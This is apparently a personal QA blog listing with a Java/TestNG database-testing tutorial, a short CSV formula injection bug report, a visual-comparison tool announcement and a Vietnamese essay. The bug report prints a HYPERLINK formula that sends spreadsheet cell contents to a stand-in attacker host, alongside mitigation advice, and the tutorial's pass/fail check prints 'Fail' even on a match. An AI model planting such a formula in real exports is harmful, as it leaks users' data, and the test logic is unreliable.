Database testing with Java

July 30, 2017

Automated from the UI is good, but it’s better if we can verify and comparing the value on the web UI with the actual value from the database, that helps us to make sure it’s correct and integrity. This article will show you how to read and verify database values with Java code.

I will assume that you have successfully installed XAMPP so we can create the new database, table for testing this code.

1. Database preparation

Go to phpMyAdmin (http://localhost/phpmyadmin/) and create the new database (“TESTDB”) with the below SQL statement:

CREATE DATABASE testDB;
USE testDB;

1 2	CREATE DATABASE testDB; USE testDB;

We also need to create the table (“CUSTOMERS”) and insert some values to that table.

CREATE TABLE CUSTOMERS(
   ID   INT              NOT NULL,
   NAME VARCHAR (20)     NOT NULL,
   AGE  INT              NOT NULL,
   ADDRESS  CHAR (25) ,
   SALARY   DECIMAL (18, 2),      
   PRIMARY KEY (ID)
);


INSERT INTO CUSTOMERS (ID,NAME,AGE,ADDRESS,SALARY)
VALUES (1, 'Ramesh', 32, 'Ahmedabad', 2000.00 );

INSERT INTO CUSTOMERS (ID,NAME,AGE,ADDRESS,SALARY)
VALUES (2, 'Khilan', 25, 'Delhi', 1500.00 );

INSERT INTO CUSTOMERS (ID,NAME,AGE,ADDRESS,SALARY)
VALUES (3, 'kaushik', 23, 'Kota', 2000.00 );

INSERT INTO CUSTOMERS (ID,NAME,AGE,ADDRESS,SALARY)
VALUES (4, 'Chaitali', 25, 'Mumbai', 6500.00 );

INSERT INTO CUSTOMERS (ID,NAME,AGE,ADDRESS,SALARY)
VALUES (5, 'Hardik', 27, 'Bhopal', 8500.00 );

INSERT INTO CUSTOMERS (ID,NAME,AGE,ADDRESS,SALARY)
VALUES (6, 'Komal', 22, 'MP', 4500.00 );

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

CREATE TABLE CUSTOMERS(

ID INT NOT NULL,

NAME VARCHAR (20) NOT NULL,

AGE INT NOT NULL,

ADDRESS CHAR (25) ,

SALARY DECIMAL (18, 2),

PRIMARY KEY (ID)

);

INSERT INTO CUSTOMERS (ID,NAME,AGE,ADDRESS,SALARY)

VALUES (1, 'Ramesh', 32, 'Ahmedabad', 2000.00 );

INSERT INTO CUSTOMERS (ID,NAME,AGE,ADDRESS,SALARY)

VALUES (2, 'Khilan', 25, 'Delhi', 1500.00 );

INSERT INTO CUSTOMERS (ID,NAME,AGE,ADDRESS,SALARY)

VALUES (3, 'kaushik', 23, 'Kota', 2000.00 );

INSERT INTO CUSTOMERS (ID,NAME,AGE,ADDRESS,SALARY)

VALUES (4, 'Chaitali', 25, 'Mumbai', 6500.00 );

INSERT INTO CUSTOMERS (ID,NAME,AGE,ADDRESS,SALARY)

VALUES (5, 'Hardik', 27, 'Bhopal', 8500.00 );

INSERT INTO CUSTOMERS (ID,NAME,AGE,ADDRESS,SALARY)

VALUES (6, 'Komal', 22, 'MP', 4500.00 );

Re-check your values with this SQL statement: SELECT * FROM CUSTOMERS;

This is the full SQL statement that you can use:

CREATE DATABASE testDB;
USE testDB;

CREATE TABLE CUSTOMERS(
   ID   INT              NOT NULL,
   NAME VARCHAR (20)     NOT NULL,
   AGE  INT              NOT NULL,
   ADDRESS  CHAR (25) ,
   SALARY   DECIMAL (18, 2),      
   PRIMARY KEY (ID)
);


INSERT INTO CUSTOMERS (ID,NAME,AGE,ADDRESS,SALARY) VALUES (1, 'Ramesh', 32, 'Ahmedabad', 2000.00 );

INSERT INTO CUSTOMERS (ID,NAME,AGE,ADDRESS,SALARY) VALUES (2, 'Khilan', 25, 'Delhi', 1500.00 );

INSERT INTO CUSTOMERS (ID,NAME,AGE,ADDRESS,SALARY) VALUES (3, 'kaushik', 23, 'Kota', 2000.00 );

INSERT INTO CUSTOMERS (ID,NAME,AGE,ADDRESS,SALARY) VALUES (4, 'Chaitali', 25, 'Mumbai', 6500.00 );

INSERT INTO CUSTOMERS (ID,NAME,AGE,ADDRESS,SALARY) VALUES (5, 'Hardik', 27, 'Bhopal', 8500.00 );

INSERT INTO CUSTOMERS (ID,NAME,AGE,ADDRESS,SALARY) VALUES (6, 'Komal', 22, 'MP', 4500.00 );

SELECT * FROM CUSTOMERS;

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

CREATE DATABASE testDB;

USE testDB;

CREATE TABLE CUSTOMERS(

ID INT NOT NULL,

NAME VARCHAR (20) NOT NULL,

AGE INT NOT NULL,

ADDRESS CHAR (25) ,

SALARY DECIMAL (18, 2),

PRIMARY KEY (ID)

);

INSERT INTO CUSTOMERS (ID,NAME,AGE,ADDRESS,SALARY) VALUES (1, 'Ramesh', 32, 'Ahmedabad', 2000.00 );

INSERT INTO CUSTOMERS (ID,NAME,AGE,ADDRESS,SALARY) VALUES (2, 'Khilan', 25, 'Delhi', 1500.00 );

INSERT INTO CUSTOMERS (ID,NAME,AGE,ADDRESS,SALARY) VALUES (3, 'kaushik', 23, 'Kota', 2000.00 );

INSERT INTO CUSTOMERS (ID,NAME,AGE,ADDRESS,SALARY) VALUES (4, 'Chaitali', 25, 'Mumbai', 6500.00 );

INSERT INTO CUSTOMERS (ID,NAME,AGE,ADDRESS,SALARY) VALUES (5, 'Hardik', 27, 'Bhopal', 8500.00 );

INSERT INTO CUSTOMERS (ID,NAME,AGE,ADDRESS,SALARY) VALUES (6, 'Komal', 22, 'MP', 4500.00 );

SELECT * FROM CUSTOMERS;

The results

2. Working with Java code

First, we need to download the “mysql-connector-java” jar at https://dev.mysql.com/downloads/connector/j/5.1.html

Select and download “Platform Independent (Architecture Independent), ZIP Archive”. When the website asks for login, you just need to click on “No thanks, just start my download” if you just want to download it without login.

Unzip this file and import “mysql-connector-java-5.1.43-bin.jar” to your project, the file version should be difference based on the time you download, so do not worry if you see the other number of jar version.

Ok, that’s good for now, we need to create a new Class and use this code, here’s my full code and explanation below:

package tcLogin;

import java.sql.Connection;
import java.sql.Statement;
import org.testng.annotations.*;
import java.sql.ResultSet;
import java.sql.DriverManager;

public class database {

	// Config information
	static Connection con = null;
	private static Statement stmt;
	public static String DB_URL = "jdbc:mysql://localhost:3306/testdb";
	public static String DB_USER = "root";
	public static String DB_PASSWORD = "";

	// SQL queries
	String queryShowCustomers = "SELECT * FROM CUSTOMERS";
	String queryInsertCustomer = "INSERT INTO CUSTOMERS (ID,NAME,AGE,ADDRESS,SALARY) VALUES (7, 'Sang', 01, 'AB', 2000.00)";
	String queryUpdateCustomer = "UPDATE Customers SET ADDRESS = 'VN', SALARY= '10000' WHERE ID = 6";
	String queryVerifySalaryWithID = "SELECT SALARY FROM CUSTOMERS WHERE ID = 6";
	
	@BeforeTest
	public void setUp() throws Exception {
		try {
			// Make the database connection
			String dbClass = "com.mysql.jdbc.Driver";
			Class.forName(dbClass).newInstance();

			// Get connection to DB
			Connection con = DriverManager.getConnection(DB_URL, DB_USER, DB_PASSWORD);
			// Statement object to send the SQL statement to the Database
			stmt = con.createStatement();

		} catch (Exception e) {
			e.printStackTrace();
		}
	}
	
	
	@Test(enabled = false)
	public void testqueryShowCustomers() {
		try {
			// Get the contents of table from DB
			ResultSet res = stmt.executeQuery(queryShowCustomers);

			// Print the all result
			while (res.next()) {
				String cusID = res.getString(1);
				String cusName = res.getString(2);
				String cusAge = res.getString(3);
				String cusAddress = res.getString(4);
				String cusSalary = res.getString(5);

				System.out.println(cusID + "\t" + cusName + "\t" + cusAge + "\t" + cusAddress + "\t" + cusSalary);
			}

		} catch (Exception e) {
			e.printStackTrace();
		}
	}
	

	@Test(enabled = false)
	public void queryUpdateCustomer() {
		try {
			
			// Update data value
			stmt.executeUpdate(queryUpdateCustomer);

		} catch (Exception e) {
			e.printStackTrace();
		}
	}	
	
	@Test(enabled = false)
	public void queryInsertCustomers() {
		try {			
			// Insert data value
			stmt.executeUpdate(queryInsertCustomer);

		} catch (Exception e) {
			e.printStackTrace();
		}
	}	
	
	
	@Test(enabled = false)
	public void testqueryShowCustomersWithID() {
		try {
			// Get the contents of table from DB
			ResultSet res = stmt.executeQuery(queryVerifySalaryWithID);

			// Print the all result
			while (res.next()) {	
				String cusSalary = res.getString(1);
				
				if (cusSalary.equals("4500.00"))
				{
					System.out.println("Pass");
				}		
				System.out.println("Fail, the actual value is " + cusSalary);
			}

		} catch (Exception e) {
			e.printStackTrace();
		}
	}
		

	@AfterTest
	public void tearDown() throws Exception {
		// Close DB connection
		if (con != null) {
			con.close();
		}
	}

}

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

47

48

49

50

51

52

53

54

55

56

57

58

59

60

61

62

63

64

65

66

67

68

69

70

71

72

73

74

75

76

77

78

79

80

81

82

83

84

85

86

87

88

89

90

91

92

93

94

95

96

97

98

99

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

package tcLogin;

import java.sql.Connection;

import java.sql.Statement;

import org.testng.annotations.*;

import java.sql.ResultSet;

import java.sql.DriverManager;

public class database {

// Config information

static Connection con = null;

private static Statement stmt;

public static String DB_URL = "jdbc:mysql://localhost:3306/testdb";

public static String DB_USER = "root";

public static String DB_PASSWORD = "";

// SQL queries

String queryShowCustomers = "SELECT * FROM CUSTOMERS";

String queryInsertCustomer = "INSERT INTO CUSTOMERS (ID,NAME,AGE,ADDRESS,SALARY) VALUES (7, 'Sang', 01, 'AB', 2000.00)";

String queryUpdateCustomer = "UPDATE Customers SET ADDRESS = 'VN', SALARY= '10000' WHERE ID = 6";

String queryVerifySalaryWithID = "SELECT SALARY FROM CUSTOMERS WHERE ID = 6";

@BeforeTest

public void setUp() throws Exception {

try {

// Make the database connection

String dbClass = "com.mysql.jdbc.Driver";

Class.forName(dbClass).newInstance();

// Get connection to DB

Connection con = DriverManager.getConnection(DB_URL, DB_USER, DB_PASSWORD);

// Statement object to send the SQL statement to the Database

stmt = con.createStatement();

} catch (Exception e) {

e.printStackTrace();

}

}

@Test(enabled = false)

public void testqueryShowCustomers() {

try {

// Get the contents of table from DB

ResultSet res = stmt.executeQuery(queryShowCustomers);

// Print the all result

while (res.next()) {

String cusID = res.getString(1);

String cusName = res.getString(2);

String cusAge = res.getString(3);

String cusAddress = res.getString(4);

String cusSalary = res.getString(5);

System.out.println(cusID + "\t" + cusName + "\t" + cusAge + "\t" + cusAddress + "\t" + cusSalary);

}

} catch (Exception e) {

e.printStackTrace();

}

}

@Test(enabled = false)

public void queryUpdateCustomer() {

try {

// Update data value

stmt.executeUpdate(queryUpdateCustomer);

} catch (Exception e) {

e.printStackTrace();

}

}

@Test(enabled = false)

public void queryInsertCustomers() {

try {

// Insert data value

stmt.executeUpdate(queryInsertCustomer);

} catch (Exception e) {

e.printStackTrace();

}

}

@Test(enabled = false)

public void testqueryShowCustomersWithID() {

try {

// Get the contents of table from DB

ResultSet res = stmt.executeQuery(queryVerifySalaryWithID);

// Print the all result

while (res.next()) {

String cusSalary = res.getString(1);

if (cusSalary.equals("4500.00"))

{

System.out.println("Pass");

}

System.out.println("Fail, the actual value is " + cusSalary);

}

} catch (Exception e) {

e.printStackTrace();

}

}

@AfterTest

public void tearDown() throws Exception {

// Close DB connection

if (con != null) {

con.close();

}

}

}

Code Explanation:

This is the config information, it is including your database url with dbname, user and password for accessing the data. The configuration should be the same if you are using XAMPP like me.

// Config information
static Connection con = null;
private static Statement stmt;
public static String DB_URL = "jdbc:mysql://localhost:3306/testdb";
public static String DB_USER = "root";
public static String DB_PASSWORD = "";

1

2

3

4

5

6

// Config information

static Connection con = null;

private static Statement stmt;

public static String DB_URL = "jdbc:mysql://localhost:3306/testdb";

public static String DB_USER = "root";

public static String DB_PASSWORD = "";

Pre-define the SQL statement that you need to use, the java code will call these statements to work with database.

// SQL queries
String queryShowCustomers = "SELECT * FROM CUSTOMERS";
String queryInsertCustomer = "INSERT INTO CUSTOMERS (ID,NAME,AGE,ADDRESS,SALARY) VALUES (7, 'Sang', 01, 'AB', 2000.00)";
String queryUpdateCustomer = "UPDATE Customers SET ADDRESS = 'VN', SALARY= '10000' WHERE ID = 6";
String queryVerifySalaryWithID = "SELECT SALARY FROM CUSTOMERS WHERE ID = 6";

1

2

3

4

5

// SQL queries

String queryShowCustomers = "SELECT * FROM CUSTOMERS";

String queryInsertCustomer = "INSERT INTO CUSTOMERS (ID,NAME,AGE,ADDRESS,SALARY) VALUES (7, 'Sang', 01, 'AB', 2000.00)";

String queryUpdateCustomer = "UPDATE Customers SET ADDRESS = 'VN', SALARY= '10000' WHERE ID = 6";

String queryVerifySalaryWithID = "SELECT SALARY FROM CUSTOMERS WHERE ID = 6";

Create the database connection with the below code.

@BeforeTest
	public void setUp() throws Exception {
		try {
			// Make the database connection
			String dbClass = "com.mysql.jdbc.Driver";
			Class.forName(dbClass).newInstance();

			// Get connection to DB
			Connection con = DriverManager.getConnection(DB_URL, DB_USER, DB_PASSWORD);
			// Statement object to send the SQL statement to the Database
			stmt = con.createStatement();

		} catch (Exception e) {
			e.printStackTrace();
		}
	}

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

@BeforeTest

public void setUp() throws Exception {

try {

// Make the database connection

String dbClass = "com.mysql.jdbc.Driver";

Class.forName(dbClass).newInstance();

// Get connection to DB

Connection con = DriverManager.getConnection(DB_URL, DB_USER, DB_PASSWORD);

// Statement object to send the SQL statement to the Database

stmt = con.createStatement();

} catch (Exception e) {

e.printStackTrace();

}

}

Note: I have set the @Test(enabled = false) to disable the test and run the single method, so if you want to execute you have to turn on by @Test(enabled = true), by this example I’m using TestNG.

# Executing the queryShowCustomers (“SELECT * FROM CUSTOMERS”)

@Test(enabled = true)
	public void testqueryShowCustomers() {
		try {
			// Get the contents of table from DB
			ResultSet res = stmt.executeQuery(queryShowCustomers);

			// Print the all result
			while (res.next()) {
				String cusID = res.getString(1);
				String cusName = res.getString(2);
				String cusAge = res.getString(3);
				String cusAddress = res.getString(4);
				String cusSalary = res.getString(5);

				System.out.println(cusID + "\t" + cusName + "\t" + cusAge + "\t" + cusAddress + "\t" + cusSalary);
			}

		} catch (Exception e) {
			e.printStackTrace();
		}
	}

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

@Test(enabled = true)

public void testqueryShowCustomers() {

try {

// Get the contents of table from DB

ResultSet res = stmt.executeQuery(queryShowCustomers);

// Print the all result

while (res.next()) {

String cusID = res.getString(1);

String cusName = res.getString(2);

String cusAge = res.getString(3);

String cusAddress = res.getString(4);

String cusSalary = res.getString(5);

System.out.println(cusID + "\t" + cusName + "\t" + cusAge + "\t" + cusAddress + "\t" + cusSalary);

}

} catch (Exception e) {

e.printStackTrace();

}

}

# Executing queryUpdateCustomer (“UPDATE Customers SET ADDRESS = ‘VN’, SALARY= ‘10000’ WHERE ID = 6”)

@Test(enabled = true)
	public void queryUpdateCustomer() {
		try {
			
			// Update data value
			stmt.executeUpdate(queryUpdateCustomer);

		} catch (Exception e) {
			e.printStackTrace();
		}
	}

1

2

3

4

5

6

7

8

9

10

11

@Test(enabled = true)

public void queryUpdateCustomer() {

try {

// Update data value

stmt.executeUpdate(queryUpdateCustomer);

} catch (Exception e) {

e.printStackTrace();

}

}

# Executing queryInsertCustomer (“INSERT INTO CUSTOMERS (ID,NAME,AGE,ADDRESS,SALARY) VALUES (7, ‘Sang’, 01, ‘AB’, 2000.00)”)

	@Test(enabled = true)
	public void queryInsertCustomers() {
		try {			
			// Insert data value
			stmt.executeUpdate(queryInsertCustomer);

		} catch (Exception e) {
			e.printStackTrace();
		}
	}

1

2

3

4

5

6

7

8

9

10

@Test(enabled = true)

public void queryInsertCustomers() {

try {

// Insert data value

stmt.executeUpdate(queryInsertCustomer);

} catch (Exception e) {

e.printStackTrace();

}

}

# Executing queryVerifySalaryWithID (“SELECT SALARY FROM CUSTOMERS WHERE ID = 6”)

@Test(enabled = true)
	public void testqueryShowCustomersWithID() {
		try {
			// Get the contents of table from DB
			ResultSet res = stmt.executeQuery(queryVerifySalaryWithID);

			// Print the all result
			while (res.next()) {	
				String cusSalary = res.getString(1);
				
				if (cusSalary.equals("4500.00"))
				{
					System.out.println("Pass");
				}		
				System.out.println("Fail, the actual value is " + cusSalary);
			}

		} catch (Exception e) {
			e.printStackTrace();
		}
	}

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

@Test(enabled = true)

public void testqueryShowCustomersWithID() {

try {

// Get the contents of table from DB

ResultSet res = stmt.executeQuery(queryVerifySalaryWithID);

// Print the all result

while (res.next()) {

String cusSalary = res.getString(1);

if (cusSalary.equals("4500.00"))

{

System.out.println("Pass");

}

System.out.println("Fail, the actual value is " + cusSalary);

}

} catch (Exception e) {

e.printStackTrace();

}

}

With this example code, you can verify and read the values from database and comparing with the UI to make sure it’s the same and consistent (as we often do with manual testing). I’m willing to support if you have any difficulties or questions on this. Just let me know at the below comment box or via email (I have put the email on my blog profile).

read more

Security

CSV Excel Macro Injection at Hackerone

July 28, 2017

Summary: CSV Excel Macro Injection at ‘reference‘ value

Description: This is inherently risky, because any cells starting with the ‘=’ character will be interpreted by the spreadsheet software as formulae.

Steps To Reproduce

1. At the References of the bug report, add the below script:

=HYPERLINK("http://hacker.com?leak="&A1,"Error: please click for further information")

1

=HYPERLINK("http://hacker.com?leak="&A1,"Error: please click for further information")

2. Download as CSV and check References column

What is it?

CSV Excel Macro Injection also known as CEMI.

Many web applications allow the user to download content such as templates for invoices or user settings to a CSV file. Many users choose to open the CSV file in either Excel,Libre Office or Open Office. When a web application does not properly validate the contents of the CSV file, it could lead to contents of a cell or many cells being executed.

The CSV cell will show this info: “Error: please click for further information” and if the user click on this message, they will exfiltrate the contents of cells A1 to http://hacker.com?leak=, which may include the user sensitive data.

“Spreadsheet software could take steps to mitigate some of these attacks, but preventing formula injection is ultimately the responsibility of every application that generates spreadsheets containing user-supplied content. At present, the best defence strategy we are aware of is prefixing cells that start with ‘=’ , ‘+’ or ‘-‘ with an apostrophe. This will ensure that the cell isn’t interpreted as a formula, and as a bonus in Microsoft Excel the apostrophe itself will not be displayed.

Another lesson from this is that .csv and .tsv files should not be viewed as equivalent to .txt files in terms of safety, as it’s simple to embed active content into them.”

Reference

https://www.owasp.org/index.php/CSV_Excel_Macro_Injection
https://www.contextis.com/resources/blog/comma-separated-vulnerabilities

read more

No Comments
Automation, Testing

An introduction to jComparison v1.0

July 20, 2017
Automated visual testing is really challenge. Comparing layouts day by day is also challenge and take time. It’s the reason why we want to develop a tool to support our automation script and saves time to compare the layout.

This tool is free and going to open the source as we want to share our work to the community and improving it with your supports.

Download here

The Idea:
We have created 2 folders to store all images of two times of the regression test by date: Regression_Results_20170719 & Regression_Results_20170720
We will compare all layout of these folders to detect the inconsistent or changed layout.
If the layouts are the same after 2 times executing, it should be Passed.
If there is any difference between 2 times of executing, it should be Failed and show us the differences.

How to use?
It’s quite simple.
1. All you need to do is including the script to take a screenshot as the below file name format – so after your automation script finished, it will creating image for you to compare.

Image name format: LayoutName_yyyy-mm-dd-hh-mm-ss.png
Example: Home_2017-07-19-11-22-09.png

2. At the jComparison app
- Select the first image folder
- Select the second image folder
- Click on Compare button => Show the results as below
- Click on the row of difference status to check the mismatch with highlight color
- Click on Export TXT or CSV to export the results to file. The file of report will store at the same folder/place of the jar file
- There are 2 modes:
  Strictly: Comparing exactly the same, this mode will using exact color code for comparision. This mean a little bit darker color will be list as different.
  Simple: This mode will not using exact color code for comparision. This mean a little bit darker color might not be list as different.
The main layout of jComparison

Exported results as CSV and TXT

Highlight the mismatch spot

Note:
- To apply visual testing by using this tool, we have to make sure the screen/browser size is the same.
- The test data should be the same, we just test the layout – not the data.
- Test the tool carefully with the small number of images, before you apply it to your project, to make sure it works as expected.
- Give us your feedback ([email protected]) based on your real issues, when we have your feedback, we have an idea for improving it.
read more

No Comments
Blog

Làm việc nhỏ tử tế

July 18, 2017

Có lần nói chuyện với một đồng nghiệp, chị bảo chị thích làm ở đây nhất, dù với kinh nghiệm hiện tại chị dễ dàng xin ở một công ty khác. Mình hỏi tại sao, chị bảo chị thích tòa nhà này, cái gì cũng tốt từ vệ sinh đến từng người làm bảo vệ ở đây, ai cũng lịch sự, tử tế, chị thích không gian như vậy.

Tôi có biết một đứa làm tự do, ngày nào cũng ra đúng một quán để làm việc, hỏi nó sao không trải nghiệm nhiều quán, mỗi ngày một nơi cho nó vui, thử thức uống này nọ nữa, dù sao thì cũng trả chừng ấy tiền cho mỗi buổi, sao cứ cắm đầu một chỗ này không chán sao – hay quán này có gì đặc biệt? Nó bảo ở đây mạng tốt, nên nó đến thường xuyên thôi, không có gì đặc biệt hết.

Tôi hay ăn ngoài, buổi tối gần chỗ ở có một vài quán, nhưng nếu ăn cơm rang tôi lại đến đúng một quán, không phải vì nó ngon hay rẻ hơn các quán khác, mà nó có kèm dưa chuột chua, chỗ khác không có kèm cái này, hay muốn có phải xin thêm. Mấy đứa sinh viên cũng hay ăn đây cũng cùng lý do, nhất là mấy đứa con gái, có thêm chút rau củ ai chả thích.

Vào hai tòa nhà lớn, để biết được sự tỉ mỉ và đẳng cấp thường không xem số tầng hay tổng số bao nhiêu phòng. Cứ đi thử nhà vệ sinh là biết, những nơi tốt thường có chế độ vệ sinh theo giờ, cứ mỗi giờ có người vào kiểm tra dọn dẹp một lần nên lúc nào nó cũng khô, sạch và đầy đủ giấy. Những nơi khác thì kiểm tra theo hứng của nhân viên vệ sinh, nên có khi nước chảy cả buổi hay giấy hết nửa ngày mà không ai biết.

Có người từng nói: chuyên nghiệp nằm ở sự chi tiết. Nghĩ thấy đúng thật.
Và đôi lúc sự chi tiết là yếu tố chính của việc cạnh tranh chứ không phải những cái to tác khác.

Nói đến đây tôi lại nhớ đến status trên facebook của một người bạn – bạn ghi một dòng ngắn gọn trên face của mình: “Làm việc nhỏ từ tế”
Câu này tuy ngắn gọn nhưng rất khó thực hiện.

Làm những việc lớn thì đã khó, làm những việc nhỏ một cách tử tế cũng khó vì nó cần thời gian, sự chỉnh chu, nhiều sự cố gắng – và vì việc lớn cũng như việc nhỏ tử tế nó cũng thường không xuất phát từ những suy nghĩ nhỏ bé bình thường.

//S.B

read more

No Comments